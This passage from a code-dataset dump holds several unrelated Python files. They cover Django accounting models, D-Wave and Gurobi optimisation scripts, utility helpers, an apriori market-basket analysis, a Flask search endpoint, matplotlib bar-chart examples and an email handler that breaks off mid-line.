models.IntegerField(\"Group\", blank=True, null=True)\n # [0-1] Batch: identification of one batch: transactions belong together\n batch = models.CharField(\"Batch\", max_length=MAX_TEXT_LEN, blank=True, default=\"\")\n # [1] Date \n date = models.DateTimeField(\"Date\", default=timezone.now)\n # [0-1] Description\n description = models.TextField(\"Description\", blank=True, default=\"\")\n # [1] Obligatory link to a project\n project = models.ForeignKey(Project, null=True, related_name='transgroups')\n\n def __str__(self):\n sShort = \"{}\".format(self.group)\n return sShort\n\n\nclass Transaction(models.Model):\n \"\"\"Transfer from one account to another one\"\"\"\n\n # [1] Obligatory side of the entry\n side = models.CharField(\"Debet or credit\", choices=build_abbr_list(ENTRY_SIDE), max_length=5, default='0')\n # [1] The account that needs to be charged at the indicated side\n account = models.ForeignKey(Account, null=True, related_name=\"account_transactions\")\n # [1] Pointer to transgroup\n tgroup = models.ForeignKey(TransGroup, null=True, related_name=\"group_transactions\")\n\n # [0-1] Conscribo identifier (if applicable; 'boekstuknummer')\n transactionNr = models.CharField(\"Boekstuk nummer\", blank=True, null=True, max_length=MAX_TEXT_LEN)\n # [1] The local amount (in local currency)\n local = models.FloatField(\"Bedrag in valuta\", blank=False, null=False, default=0.0)\n # [1] Valuta die gebruikt wordt\n valuta = models.CharField(\"Valuta\", max_length=MAX_TEXT_LEN, default=\"EUR\")\n # [1] Exchange rate\n rate = models.FloatField(\"Wisselkoers\", default=1.0)\n # [1] The amount of the transfer (in Euro's)\n amount = models.FloatField(\"Amount\", blank=False, null=False)\n # [0-1] Optional person associated \n person = models.ForeignKey(Person, blank=True, null=True)\n # [0-1]\n extra = models.TextField(\"Additional information\", default=\"\")\n # [1] Obligatory synchronisation status\n sync = models.CharField(\"Sync status\", max_length=20, default=\"true\")\n # [1] Obligatory link to a project\n project = models.ForeignKey(Project, blank=False, null=False, related_name='transactions')\n\n def __str__(self):\n sShort = \"{}-{}: {}\".format(self.debet, self.credit, self.amount)\n return sShort\n\n def get_currency(self):\n if self.valuta == \"CFA\":\n return \"XOF\"\n else:\n return self.valuta\n\n def get_side_html(self):\n color= \"red\" if self.side == \"cr\" else \"green\"\n name = \"Credit\" if self.side == \"cr\" else \"Debet\"\n return \"{}\".format(color, name)\n\n def debit_project(self):\n \"\"\"If this transaction has a purpose A-F, return that\"\"\"\n\n purpose = self.debet.purpose.name\n sCheck = purpose.lower()\n if \"doelstelling\" in sCheck or \"algemeen\" in sCheck:\n return purpose\n else:\n return \"\"\n\n def credit_project(self):\n \"\"\"If this transaction has a purpose A-F, return that\"\"\"\n \n purpose = self.credit.purpose.name\n sCheck = purpose.lower()\n if \"doelstelling\" in sCheck or \"algemeen\" in sCheck:\n return purpose\n else:\n return \"\"\n\n\n def get_row(self):\n debet = \"\" if self.debet == None else str(self.debet.number)\n credit = \"\" if self.credit == None else str(self.credit.number)\n person = \"\" if self.person == None else self.person.name\n arRow = []\n arRow.append(self.id)\n arRow.append(self.doc)\n arRow.append(self.group)\n arRow.append(self.batch)\n arRow.append(self.date)\n arRow.append(self.description)\n arRow.append(debet)\n arRow.append(credit)\n arRow.append(self.local)\n arRow.append(self.valuta)\n arRow.append(self.rate)\n arRow.append(self.amount)\n arRow.append(person)\n return arRow\n\n def get_outputColumns():\n outputColumns = ['id', 'doc', 'group', 'batch', 'date', 'description', \n \"debet\", \"credit\", \"local\", \"valuta\",\n \"rate\", \"amount\", \"person\"]\n return outputColumns\n\n\nclass TransRule(models.Model):\n \"\"\"Rule to process a transaction automatically\"\"\"\n\n source = models.ForeignKey(Account, blank=False, null=False, related_name=\"basisrekening\")\n target = models.ForeignKey(Account, blank=False, null=False, related_name=\"tegenrekening\")\n action = models.CharField(\"Bij- of afschrijving\", choices=build_choice_list(EXPENSE_TYPE), \n max_length=5, default=0)\n person = models.ForeignKey(Person, blank=True, null=True)\n omschrijving = models.TextField(\"Woord(en) in de omschrijving\", blank=True, default=\"\")\n\n def __str__(self):\n return self.id\n\n def bankrekening(self):\n return self.source.name\n\n def tegenrekening(self):\n return self.target.name\n\n\nclass Status(models.Model):\n \"\"\"Intermediate loading of /crpp information and status of processing it\"\"\"\n\n # [1] Status of the process\n status = models.CharField(\"Status of synchronization\", max_length=50)\n # [1] Counts (as stringified JSON object)\n count = models.TextField(\"Count details\", default=\"{}\")\n # [0-1] Synchronisation type\n type = models.CharField(\"Type\", max_length=255, default=\"\")\n # [0-1] User\n user = models.CharField(\"User\", max_length=255, default=\"\")\n # [0-1] Error message (if any)\n msg = models.TextField(\"Error message\", blank=True, null=True)\n\n def __str__(self):\n # Refresh the DB connection\n self.refresh_from_db()\n # Only now provide the status\n return self.status\n\n def set(self, sStatus, oCount = None, msg = None):\n self.status = sStatus\n if oCount != None:\n self.count = json.dumps(oCount)\n if msg != None:\n self.msg = msg\n self.save()\n","sub_path":"doubenfi/doubenfi/finance/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":39479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"360011204","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/tpMayaLib/core/common.py\n# Compiled at: 2020-01-16 21:52:40\n# Size of source mod 2**32: 560 bytes\n\"\"\"\nModule that contains common definitions for tpMayaLib\n\"\"\"\nfrom __future__ import print_function, division, absolute_import\nPIVOT_ARGS = dict(rp=['rp', 'r', 'rotate', 'rotatePivot', 'pivot'], sp=['scale', 's', 'scalePivot'], local=[\n 'l', 'translate'],\n boundingBox=['bb', 'bbCenter'],\n axisBox=['ab'],\n closestPoint=[\n 'cpos', 'closest', 'closestPoint'])\nSPACE_ARGS = {'object':[\n 'os', 'objectSpace', 'o'], \n 'world':['w', 'worldSpace', 'ws'], 'local':['l', 'translate']}","sub_path":"pycfiles/tpmayalib-0.0.17-py3.6/common.cpython-36.py","file_name":"common.cpython-36.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"142992415","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# $ vim ~/.config/dwave/dwave.conf\n# $ time nice -n 20 python quant_opt.py\n# $ for i in {0..9}; do python quant_opt.py; done\n\nimport gc\nimport dwave_networkx as dnx\nfrom quant_solver import QuantSolver\nfrom store_object import StoreObject\nfrom benchmarks import Benchmarks\n\nfrom itertools import product\n\nimport dimod\nfrom dwave.system.samplers import DWaveSampler\n\nfrom dwave.system.composites import FixedEmbeddingComposite\nfrom minorminer import find_embedding\nfrom dwave.embedding import embed_qubo\n\n\n\ndef run_solver(lv, qm, id_pr, newemb=0, id_solver=1, optimal_value=0, runs=10, ex_type=0, id_model=0, model=None):\n\tresponse = None\n\tqr = QuantSolver(id_pr, id_solver, optimal_value, runs, ex_type, id_model, model)\n\tbqm = qr.run_Setup(lv, qm, newemb)\n\n\tif runs > 0: # send to quantum machine\n\t\tif id_solver == 1: # Direct\n\t\t\tprint('', '#' * 50, ' DIRECT', '#' * 50, '', sep='\\n')\n\t\t\tresponse = qr.run_Direct(bqm)\n\t\telif id_solver == 2: # QBsolv\n\t\t\tprint('', '#' * 50, ' QBSOLV', '#' * 50, '', sep='\\n')\n\t\t\tresponse = qr.run_QBsolv(bqm)\n\t\telif id_solver == 3: # Hybrid\n\t\t\tprint('', '#' * 50, ' HYBRID', '#' * 50, '', sep='\\n')\n\t\t\tresponse = qr.run_Hybrid(bqm)\n\n\tdel qr\n\treturn response\n\n\ndef run_model(qm, newemb=0, id_solver=1, runs=10, ex_type=0, id_model=0, model=None):\n\tprint('', '#' * 50, model, '#' * 50, '', sep='\\n')\n\n\tif True: # Run Gurobi\n\t\t#print('', '#' * 50, ' GUROBI', '#' * 50, '', sep='\\n')\n\t\t# First initialize the benchmarks object\n\t\tbn = Benchmarks()\n\t\t\n\t\tsol_Gurobi_QUBO, opt_val_Gurobi_QUBO, status_Gurobi_QUBO = bn.gurobi_solve_QUBO(qm)\n\t\tprint(\"Gurobi QUBO optimal value: {}\".format(opt_val_Gurobi_QUBO))\n\n\t\tsol_Gurobi_penaltyQuadratic, opt_val_Gurobi_penaltyQuadratic, status_Gurobi_penaltyQuadratic = bn.gurobi_solve_penaltyQuadratic(qm)\n\t\tprint(\"Gurobi Penalty Quadratic optimal value: {}\".format(opt_val_Gurobi_penaltyQuadratic))\n\n\t\tsol_Gurobi_Quadratic, opt_val_Gurobi_Quadratic, iterations, status_Gurobi_Quadratic = bn.gurobi_solve_QuadraticRecursive(qm)\n\t\tprint(\"Gurobi Quadratic optimal value ({} iterations): {}\".format(iterations, opt_val_Gurobi_Quadratic))\n\n\t\tsol_Gurobi_MILP, opt_val_MILP, status_Gurobi_MILP = bn.gurobi_solve_MILP(qm)\n\t\tprint(\"Gurobi Original MILP optimal value: {}\".format(opt_val_MILP))\n\n\t\tdel bn\n\n\tif True:\n\t\tfor i in range(0, 1): # SETUP: Generate Several Tests with new BQM, Embeddings, Experiments\n\t\t\tprint('#' * 50, ' RUN SOLVER', (i + 1), '#' * 50)\n\t\t\tresponse = run_solver(qm.H0b, qm.Hb, qm.id_pr, newemb, id_solver, opt_val_Gurobi_QUBO, runs, ex_type, id_model, model) # Run Solver\n\t\t\t# select id, id_emb, runs, energy_min, p01, p02, p03, p04, p05, p1, p2, p3, p4, p5 from experiments order by p01 desc, p03 desc, p05 desc, p1 desc, p2 desc, p3 desc;\n\n\tif False: # Save Object Response\n\t\tso = StoreObject()\n\t\tso.pickle_save(response, model)\n\t\tdel so\n\n\tprint('', '#' * 50, ' END', '#' * 50, '', sep='\\n')\n\tgc.collect()\n\treturn(opt_val_Gurobi_QUBO, \n\t\t\t opt_val_Gurobi_penaltyQuadratic, \n\t\t\t opt_val_Gurobi_Quadratic,\n\t\t\t opt_val_MILP, \n\t\t\t status_Gurobi_QUBO, \n\t\t\t status_Gurobi_penaltyQuadratic, \n\t\t\t status_Gurobi_Quadratic, \n\t\t\t status_Gurobi_MILP)\n\n\ndef run_model_simple(qm, newemb=0, id_solver=1, runs=10, ex_type=0, id_model=0, model=None, gurobi_single=0, quantum=0, gurobi_embedded=0):\n\tprint('', '#' * 50, model, '#' * 50, '', sep='\\n')\n\t\n\t# Some necessary initialization\n\topt_val_Gurobi_DWaveQUBO = 0.0\n\topt_val_D_Wave_QUBO = 0.0\n\topt_val_gurobi_embedded = 0.0\n\tstatus_Gurobi_DWaveQUBO = 0\n\tstatus_DWave_Qubo = 0\n\tstatus_gurobi_embedded = 0\n\t\n\tbn = Benchmarks()\n\t\n\tsol_Gurobi_QUBO, opt_val_Gurobi_QUBO, status_Gurobi_QUBO = bn.gurobi_solve_QUBO(qm)\n\tprint(\"Gurobi QUBO optimal value: {}\".format(opt_val_Gurobi_QUBO))\n\n\tsol_Gurobi_penaltyQuadratic, opt_val_Gurobi_penaltyQuadratic, status_Gurobi_penaltyQuadratic = bn.gurobi_solve_penaltyQuadratic(qm)\n\tprint(\"Gurobi Penalty Quadratic optimal value: {}\".format(opt_val_Gurobi_penaltyQuadratic))\n\n\tsol_Gurobi_Quadratic, opt_val_Gurobi_Quadratic, iterations, status_Gurobi_Quadratic = bn.gurobi_solve_QuadraticRecursive(qm)\n\tprint(\"Gurobi Quadratic optimal value ({} iterations): {}\".format(iterations, opt_val_Gurobi_Quadratic))\n\n\tsol_Gurobi_MILP, opt_val_MILP, status_Gurobi_MILP = bn.gurobi_solve_MILP(qm)\n\tprint(\"Gurobi Original MILP optimal value: {}\".format(opt_val_MILP))\n\t\n\tif gurobi_single == 1:\n\t\tsol_Gurobi_DWaveQUBO, opt_val_Gurobi_DWaveQUBO, status_Gurobi_DWaveQUBO = bn.gurobi_solve_DWaveQUBO(qm)\n\t\tprint(\"Gurobi D-Wave QUBO optimal value: {}\".format(opt_val_Gurobi_DWaveQUBO))\t\n\t\n\t\n\tif quantum == 1:\n\t\tfor i in range(5):\n\t\t\ttry:\n\t\t\t\topt_val_D_Wave_QUBO, status_DWave_Qubo, embedded = run_solver_simple(qm, runs)\n\t\t\t\tprint(\"D-Wave QUBO optimal value: {}\".format(opt_val_D_Wave_QUBO))\n\t\t\t\t\n\t\t\t\tif gurobi_embedded == 1:\n\t\t\t\t\tsol_gurobi_embedded, opt_val_gurobi_embedded, status_gurobi_embedded = bn.gurobi_solve_DWaveEmbedded(qm, embedded)\n\t\t\t\t\tprint(\"Gurobi Embedded optimal value: {}\".format(opt_val_gurobi_embedded))\n\t\t\t\tbreak\n\t\t\t\n\t\t\texcept:\n\t\t\t\tcontinue\t\n\t\t\t\n\tprint('', '#' * 50, ' END', '#' * 50, '', sep='\\n')\n\t\n\treturn(opt_val_Gurobi_QUBO, \n\t\t\t opt_val_Gurobi_penaltyQuadratic, \n\t\t\t opt_val_Gurobi_Quadratic,\n\t\t\t opt_val_MILP,\n\t\t\t opt_val_Gurobi_DWaveQUBO,\n\t\t\t opt_val_D_Wave_QUBO,\n\t\t\t opt_val_gurobi_embedded,\n\t\t\t status_Gurobi_QUBO, \n\t\t\t status_Gurobi_penaltyQuadratic,\n\t\t\t status_Gurobi_Quadratic,\n\t\t\t status_Gurobi_MILP, \n\t\t\t status_Gurobi_DWaveQUBO,\n\t\t\t status_DWave_Qubo,\n\t\t\t status_gurobi_embedded)\n\n\ndef run_solver_simple(qm, runs):\n\t# Set some important D-Wave parameters\n\tchain_strength = 35\n\tannealing_time_mult = 2\t\n\t\n\t# Set linear vector and quadratic matrix\n\tLV = qm.H0b\n\tQM = qm.Hb\n\t\n\t# Dictionaries of Linear and Quadratic Coefficients {(1,1):21, (2,2): 62, ...} Such that:\n\t# 1. We do not assume that the matrix is symmetric\n\t# 2. We remove quadratic pairs with value = 0.0\n\tdlv = {(t, t): LV[t][0] + QM[t, t] for t in range(len(LV))} \t\n\tdqm = {t: QM[t[0],t[1]] + QM[t[1],t[0]] \n\t\t\t for t in filter(lambda t: t[1]>t[0], product(range(len(QM)), repeat=2)) if QM[t[0],t[1]]!=0.0}\n\t\n\t# Get binary quadratic matrix from the linear and quadratic dictionaries\n\tbqm = dict(dlv)\n\tbqm.update(dqm)\n\t\n\t# Set solver (sampler) to D-Wave QPU\n\tsampler = DWaveSampler(solver={'qpu': True})\n\t\n\t# Get the sampler structure from D-Wave machine.\n\ttarget_edgelist = sampler.edgelist\n\t\n\t# Find embedding on D-Wave and Map to the sampler\n\temb = find_embedding(bqm, target_edgelist, verbose=0)\n\tcomposite = FixedEmbeddingComposite(sampler, emb)\n\t\n\t# Create the embedded graph to send back for other processes\n\tchimera = dnx.chimera_graph(16, 16, 4)\n\tembedded = embed_qubo(bqm, emb, chimera, chain_strength)\t\n\t\t\n\t# Get results from sampling the D-Wave QPU\n\tresponse = composite.sample_qubo(bqm, \n\t\t\t\t\t\t\t\t\t\t\t\tnum_reads = runs, \n\t\t\t\t\t\t\t\t\t\t\t\tanswer_mode = 'raw', \n\t\t\t\t\t\t\t\t\t\t\t\tchain_strength = chain_strength, \n\t\t\t\t\t\t\t\t\t\t\t\tannealing_time = 20*annealing_time_mult, \n\t\t\t\t\t\t\t\t\t\t\t\tauto_scale = True)\n\t\t\n\treturn response.first.energy+qm.bias, response.first.chain_break_fraction, embedded\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n\tprint('Quantum Optimization')","sub_path":"quant_opt.py","file_name":"quant_opt.py","file_ext":"py","file_size_in_byte":7254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"381461717","text":"\"\"\"\n****************************************************************************************************\n:copyright (c) 2019-2021 URBANopt, Alliance for Sustainable Energy, LLC, and other contributors.\n\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification, are permitted\nprovided that the following conditions are met:\n\nRedistributions of source code must retain the above copyright notice, this list of conditions\nand the following disclaimer.\n\nRedistributions in binary form must reproduce the above copyright notice, this list of conditions\nand the following disclaimer in the documentation and/or other materials provided with the\ndistribution.\n\nNeither the name of the copyright holder nor the names of its contributors may be used to endorse\nor promote products derived from this software without specific prior written permission.\n\nRedistribution of this software, without modification, must refer to the software by the same\ndesignation. Redistribution of a modified version of this software (i) may not refer to the\nmodified version by the same designation, or by any confusingly similar designation, and\n(ii) must refer to the underlying software originally provided by Alliance as “URBANopt”. Except\nto comply with the foregoing, the term “URBANopt”, or any confusingly similar designation may\nnot be used to refer to any modified version of this software or any modified version of the\nunderlying software originally provided by Alliance without the prior written consent of Alliance.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS OR\nIMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND\nFITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR\nCONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\nOF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n****************************************************************************************************\n\"\"\"\n\nimport logging\nimport os\nimport shutil\nfrom uuid import uuid4\n\n_log = logging.getLogger(__name__)\n\n\ndef copytree(src, dst, symlinks=False, ignore=None):\n \"\"\"\n Alternate version of copytree that will work if the directory already exists (use instead of shutil)\n \"\"\"\n for item in os.listdir(src):\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if os.path.isdir(s):\n shutil.copytree(s, d, symlinks, ignore)\n else:\n shutil.copy2(s, d)\n\n\nclass ModelicaPath(object):\n \"\"\"\n Class for storing Modelica paths. This allows the path to point to\n the model directory, resources, and scripts directory.\n \"\"\"\n\n def __init__(self, name, root_dir, overwrite=False):\n \"\"\"\n Create a new modelica-based path with name of 'name'\n\n :param name: Name to create\n \"\"\"\n self.name = name\n self.root_dir = root_dir\n self.overwrite = overwrite\n\n # create the directories\n if root_dir is not None:\n check_path = os.path.join(self.files_dir)\n self.clear_or_create_path(check_path)\n check_path = os.path.join(self.resources_dir)\n self.clear_or_create_path(check_path)\n check_path = os.path.join(self.scripts_dir)\n self.clear_or_create_path(check_path)\n\n def clear_or_create_path(self, path):\n if os.path.exists(path):\n if not self.overwrite:\n raise Exception(\"Directory already exists and overwrite is false for %s\" % path)\n else:\n shutil.rmtree(path)\n os.makedirs(path, exist_ok=True)\n\n @property\n def files_dir(self):\n \"\"\"\n Return the path to the files (models) for the specified ModelicaPath. This path does not include the\n trailing slash.\n\n :return: string, path to where files (models) are stored, without trailing slash\n \"\"\"\n if self.root_dir is None:\n return self.files_relative_dir\n else:\n return os.path.join(self.root_dir, self.name)\n\n @property\n def resources_relative_dir(self):\n \"\"\"\n Return the relative resource directory instead of the full path. This is useful when replacing\n strings within modelica files which are relative to the package.\n\n :return: string, relative resource's data path\n \"\"\"\n return os.path.join(\"Resources\", \"Data\", self.name)\n\n @property\n def scripts_relative_dir(self, platform='Dymola'):\n \"\"\"Return the scripts directory that is in the resources directory. This only returns the\n relative directory and is useful when replacing string values within Modelica files.\n\n :return: string, relative scripts path\n \"\"\"\n return os.path.join(\"Resources\", \"Scripts\", self.name, platform)\n\n @property\n def files_relative_dir(self):\n \"\"\"Return the path to the files relative to the project name.\"\"\"\n return os.path.join(self.name)\n\n @property\n def resources_dir(self):\n \"\"\"\n Return the path to the resources directory for the specified ModelicaPath. This path does not include\n the trailing slash.\n\n :return: string, path to where resources are stored, without trailing slash.\n \"\"\"\n if self.root_dir is None:\n return self.resources_relative_dir\n else:\n return os.path.join(self.root_dir, self.resources_relative_dir)\n\n @property\n def scripts_dir(self):\n \"\"\"\n Return the path to the scripts directory (in the resources dir) for the specified ModelicaPath.\n This path does not include the trailing slash.\n\n :return: string, path to where scripts are stored, without trailing slash.\n \"\"\"\n if self.root_dir is None:\n return self.scripts_relative_dir\n else:\n return os.path.join(self.root_dir, self.scripts_relative_dir)\n\n\ndef simple_uuid():\n \"\"\"Generates a simple string uuid\n\n :return: string, uuid\n \"\"\"\n return str(uuid4()).split(\"-\")[0]\n","sub_path":"geojson_modelica_translator/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"251054510","text":"import pandas as pd\nimport time\n# 导入数据\ndata = pd.read_csv('Market_Basket_Optimisation.csv',header = None)\n# 补全空值\ndata = data.fillna('')\n# 显示所有列\npd.set_option('max_columns',None)\n\n\n# 基于efficient_apriori判断关联规则\ndef rule1(s1,c1):\n from efficient_apriori import apriori\n # 计算时间\n start = time.time()\n\n # 数据格式转化\n transactions = []\n for i in range(data.shape[0]):\n temp_set = set()\n for j in data.columns:\n if data[j][i] != '':\n temp_set.add(data[j][i])\n transactions.append(temp_set)\n # print(transactions)\n\n # 挖掘频繁项集和关联规则\n itemsets ,rules = apriori(transactions, min_support = s1, min_confidence = c1)\n print('频繁项集:', itemsets)\n print('关联规则:', rules)\n end = time.time()\n print('用时1:',end-start)\n\n\n# 基于mlxtend判断关联规则\ndef rule2(s2):\n from mlxtend.frequent_patterns import apriori\n from mlxtend.frequent_patterns import association_rules\n # 计算时间\n start = time.time()\n\n # 数据格式转化\n # 1)将每行数据都放入一列,并用'-'分隔\n data['total'] = data[data.columns[:]].apply(lambda x: '-'.join(x.dropna()),axis=1)\n # 2)利用get_dummies建立one-hot编码\n data_ = data.drop(data.columns[:21],axis=1).join(data.total.str.get_dummies(sep='-'))\n\n # 挖掘频繁项集\n frequent_itemsets = apriori(data_, min_support = s2, use_colnames=True)\n # 按支持度大小,降序排列\n frequent_itemsets = frequent_itemsets.sort_values(by = 'support',ascending=False)\n print(\"频繁项集:\", frequent_itemsets)\n # 求关联规则,选取提升度为度量选项\n rules = association_rules(frequent_itemsets, metric=\"lift\", min_threshold=1)\n # 按提升度大小,降序排序\n rules = rules.sort_values(by = 'lift',ascending=False)\n print(\"关联规则:\",rules)\n\n end = time.time()\n print(\"用时2:\", end - start)\n\n\ndef main():\n # 用户自定义支持度及置信度\n s1 = float(input('\"rule1支持度\"设定为:',))\n c1 = float(input('\"rule1置信度\"设定为:',))\n rule1(s1,c1)\n print('-' * 50)\n s2 = float(input('\"rule2置信度\"设定为:',))\n rule2(s2)\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"L4/homework 4.py","file_name":"homework 4.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"130847367","text":"from flask import Blueprint, request, send_file, Response\nfrom services.DBConn import db\nimport api.AuthorizationAPI\nfrom bson.json_util import dumps\nimport json\n\n\nsearch_api = Blueprint('search_api', __name__)\nuserDB = db.users\nlistingDB = db.listings\n\n\n@search_api.route(\"\", methods=['GET'])\n@api.AuthorizationAPI.requires_auth\ndef searchListings():\n query = request.args.get('query') # /search?query=\n try:\n listings = dumps(listingDB.find({'item': {'$regex': query, \"$options\": 'i'}}))\n if listings is None:\n return json.dumps({'error': \"Searched item not found: \"})\n else:\n return listings\n except Exception as e:\n print(e)\n return json.dumps({'error': \"Server error regex searching the database.\", 'code': 123})\n","sub_path":"api/SearchAPI.py","file_name":"SearchAPI.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"240980066","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 2 16:09:14 2018\r\n\r\n@author: 74286\r\n\"\"\"\r\n\r\n\r\n# 垂直条形图\r\n\r\nimport matplotlib.pyplot as plt #导入绘图模块\r\nGDP=[12406.8,13908.57,9386.87,9143.64] #构建数据GDP\r\nplt.rcParams['font.sans-serif']=['Microsoft YaHei'] #处理中文乱码\r\nplt.rcParams['axes.unicode_minus']=False\r\n#bar函数指定了条形图的x轴、y轴值,设置x轴刻度标签为水平居中\r\n#条形图的填充色color为铁蓝色,同时设置透明度alpha为0.8\r\nplt.bar(range(4),GDP,align='center',color='steelblue',alpha=0.8) #绘图\r\nplt.ylabel('GDP') #添加轴标签\r\nplt.title('GDP data for four municipalities') #添加标题\r\nplt.xticks(range(4),['Beijing','Shanghai','Tianjin','Chongqing']) #添加刻度标签\r\nplt.ylim([5000,15000]) #设置Y轴刻度范围\r\nfor x,y in enumerate(GDP): #为每个条形图添加数值标签\r\n plt.text(x,y+100,'%s'%round(y,1),ha='center') \r\nplt.show() #显示图形\r\n\r\n# 水平条形图\r\n\r\nimport matplotlib.pyplot as plt #导入绘图模块\r\nprice=[39.5,39.9,45.4,38.9,33.34] #构建数据price\r\nplt.rcParams['font.sans-serif']=['Microsoft YaHei'] #处理中文乱码\r\nplt.rcParams['axes.unicode_minus']=False\r\nplt.barh(range(5),price,align='center',color='steelblue',alpha=0.8) #绘图\r\nplt.xlabel('price') #添加轴标签\r\nplt.title('the lowest price in different platform') #添加标题\r\nplt.yticks(range(5),['Amazon','DangDang','Chinese library','JD','Tmall']) #添加刻度标签\r\nplt.xlim([32,47]) #设置X轴的刻度范围\r\nfor x,y in enumerate(price): #为每个条形图添加数值标签\r\n plt.text(y+0.1,x,'%s'%y,va='center')\r\nplt.show() #显示图形\r\n\r\n# 垂直交错条形图\r\n\r\nimport matplotlib.pyplot as plt #导入绘图模块\r\nimport numpy as np\r\nY2016=[15600,12700,11300,4270,3620] #构建数据\r\nY2017=[17400,14800,12000,5200,4020]\r\nlabels=['Beijing','Shanghai','Hongkong','Shenzhen','Guangzhou']\r\nbar_width=0.45\r\nplt.rcParams['font.sans-serif']=['Microsoft YaHei'] #处理中文乱码\r\nplt.rcParams['axes.unicode_minus']=False\r\nplt.bar(np.arange(5),Y2016,label='2016',color='steelblue',alpha=0.8,width=bar_width)\r\nplt.bar(np.arange(5)+bar_width,Y2017,label='2017',color='indianred',alpha=0.8,width=bar_width)\r\nplt.xlabel('Top 5 Cities') #添加轴标签\r\nplt.ylabel('Family number') \r\nplt.title('the distribution of billionaire family in Top 5 cities') #添加标题\r\nplt.xticks(np.arange(5)+bar_width,labels) #添加刻度标签\r\nplt.ylim([2500,19000]) #设置Y轴的刻度范围\r\nfor x2016,y2016 in enumerate(Y2016): #为每个条形图添加数值标签\r\n #plt.text(x2016,y2016+200,'%s'%y2016) # ??? 数字显示错位\r\n #可以以下修正语句修正错位\r\n plt.text(x2016-1,y2016+200,' %s'%y2016) \r\nfor x2017,y2017 in enumerate(Y2017):\r\n plt.text(x2017,y2017+200,' %s'%y2017)\r\nplt.legend() #显示图例\r\nplt.show() #显示图形\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Python Code/matplotlib_pyplot_bar.py","file_name":"matplotlib_pyplot_bar.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"36602596","text":"from functools import wraps\n\n\ndef type_logger(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n list_ans = [f'{i} : {type(i)},' for i in args]\n list_kans = [f'{i} : {type(i)},' for i in kwargs]\n\n if len(list_ans) > 0 and len(list_kans) == 0: # удаляем лишнюю запятую в конце для красоты\n list_ans[-1] = list_ans[-1][:-1]\n elif len(list_kans) > 0:\n list_kans[-1] = list_kans[-1][:-1]\n\n print(*list_ans, *list_kans)\n dec_func = func(*args, **kwargs)\n print(f'{func.__name__}({dec_func} : {type(dec_func)})')\n return dec_func\n\n return wrapper\n\n\n@type_logger\ndef calc_cube(x, y, z, lst, **arg2):\n return x ** 3\n\n\n@type_logger\ndef calc_cube2():\n return 10 ** 3\n\n\ncalc_cube(2, 4, 6, [1, 2, 3], arg1='123', arg2='12243')\ncalc_cube2()\n","sub_path":"Nikolskiy_Aleksey_dz_8/task8_3.py","file_name":"task8_3.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"647880939","text":"import logging, yaml\nfrom models import store_email_and_attachment\n\nfrom django.utils import simplejson as json\nfrom google.appengine.ext import webapp, deferred\nfrom google.appengine.api import mail\n\nsettings = yaml.load(open('settings.yaml'))\n\ndef safe_dict(d): \n \"\"\"\n Recursively clone json structure with UTF-8 dictionary keys\n http://bugs.python.org/issue2646\n \"\"\" \n if isinstance(d, dict): \n return dict([(k.encode('utf-8'), safe_dict(v)) for k,v in d.iteritems()]) \n elif isinstance(d, list): \n return [safe_dict(x) for x in d] \n else: \n return d\n\ndef email(body):\n email = json.loads(body)\n logging.info(email)\n mail_message = mail.EmailMessage(**safe_dict(email))\n mail_message.send()\n\n #The below stores the email and any attachments\n stored_email = 